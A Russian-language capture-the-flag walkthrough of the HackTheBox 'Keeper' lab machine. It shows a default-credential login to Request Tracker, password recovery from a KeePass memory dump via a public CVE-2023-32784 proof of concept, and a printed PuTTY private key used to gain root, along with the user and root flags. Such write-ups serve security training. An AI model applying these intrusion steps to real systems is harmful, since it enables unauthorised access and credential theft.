Telegram / Видео
Обзор сервисов
Машине присвоили IP-адрес 10.10.11.227. Запустим стандартное сканирование портов с помощью nmap:
$ nmap -sV -sC -Pn -p1-65535 -oN 10.10.11.227 10.10.11.227
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-13 04:36 EDT
Nmap scan report for 10.10.11.227
Host is up (0.081s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_ 256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 716.58 seconds
Абсолютно стандартный вывод для Linux-машин HackTheBox.
Веб-интерфейс
На 80 порту нам сразу указывают два доменных имени:
keeper.htbtickets.keeper.htb
Добавим их в /etc/hosts:
$ sudo nano /etc/hosts
10.10.11.227 keeper.htb tickets.keeper.htb
На tickets.keeper.htb крутится Request Tracker (RT 4.4.4+dfsg-2ubuntu1 (Debian)).
Безуспешно попробовав некоторые комбинации паролей, мы наконец получаем учетку root:password.
В тикетах обнаруживается проблема с Keepass.
Обратим внимание на датские имена пользователей.
В разделе с пользователями обнаруживаем креды пользователя lnorgaard:Welcome2023!
С их помощью получаем доступ к SSH.
$ ssh [email protected]
Welcome2023!
Пользовательский флаг
lnorgaard@keeper:~$ ls -la
total 85380
drwxr-xr-x 4 lnorgaard lnorgaard 4096 Jul 25 20:00 .
drwxr-xr-x 3 root root 4096 May 24 16:09 ..
lrwxrwxrwx 1 root root 9 May 24 15:55 .bash_history -> /dev/null
-rw-r--r-- 1 lnorgaard lnorgaard 220 May 23 14:43 .bash_logout
-rw-r--r-- 1 lnorgaard lnorgaard 3771 May 23 14:43 .bashrc
drwx------ 2 lnorgaard lnorgaard 4096 May 24 16:09 .cache
-rw------- 1 lnorgaard lnorgaard 807 May 23 14:43 .profile
-rw-r--r-- 1 root root 87391651 Aug 13 11:40 RT30000.zip
drwx------ 2 lnorgaard lnorgaard 4096 Jul 24 10:25 .ssh
-rw-r----- 1 root lnorgaard 33 Aug 13 11:39 user.txt
-rw-r--r-- 1 root root 39 Jul 20 19:03 .vimrc
lnorgaard@keeper:~$ cat user.txt
5c7a2ea8305ebd59cdc873747f7ac88b
Повышение привилегий
В пользовательской директории /home/lnorgaard мы видим файл RT30000.zip. В тикете про краш приложения в Windows было написано, что дамп памяти был удален из тикета из соображений безопасности и положен в домашнюю директорию.
Скачаем этот файл для локального исследования:
$ scp [email protected]:/home/lnorgaard/RT30000.zip RT30000.zip
$ sha256sum RT30000.zip
273c126a68146943b022a216edc880e3bb2f7fc930df958f96a9091e9634f076 RT30000.zip
Внутри архива файл с дампом памяти и Keepass базой:
$ unzip RT30000.zip
Archive: RT30000.zip
inflating: KeePassDumpFull.dmp
extracting: passcodes.kdbx
Похоже, что перед нами CVE-2023-32784. Мы можем найти практически весь пароль из дампа памяти.
$ git clone https://github.com/CMEPW/keepass-dump-masterkey
$ python3 poc.py ../KeePassDumpFull.dmp
2023-08-13 06:44:45,222 [.] [main] Opened ../KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de
Possible password: ●Idgr●d med fl●de
Possible password: ●:dgr●d med fl●de
Possible password: ●=dgr●d med fl●de
Possible password: ●_dgr●d med fl●de
Possible password: ●cdgr●d med fl●de
Possible password: ●Mdgr●d med fl●de
Это похоже на парольную фразу, поэтому пробуем найти в гугле med flode, учитывая, что пользователи датчане.
Применяем функцию lowercase к парольной фразе и получаем rødgrød med fløde. С помощью этого пароля открываем базу passcodex.kdbx.
В категории Network находим приватный ключ от Putty:
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
Сконвертируем с помощью puttygen (conversions => Export OpenSSH key):
Подключимся с этим ключом как root:
$ chmod 600 id_rsa
$ ssh -i id_rsa [email protected]
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
You have new mail.
Last login: Tue Aug 8 19:00:06 2023 from 10.10.14.41
root@keeper:~# id
uid=0(root) gid=0(root) groups=0(root)
Флаг суперпользователя
root@keeper:~# cd /root
root@keeper:~# ls
root.txt RT30000.zip SQL
root@keeper:~# cat root.txt
794e353a47944109eedf9dde36f529f4
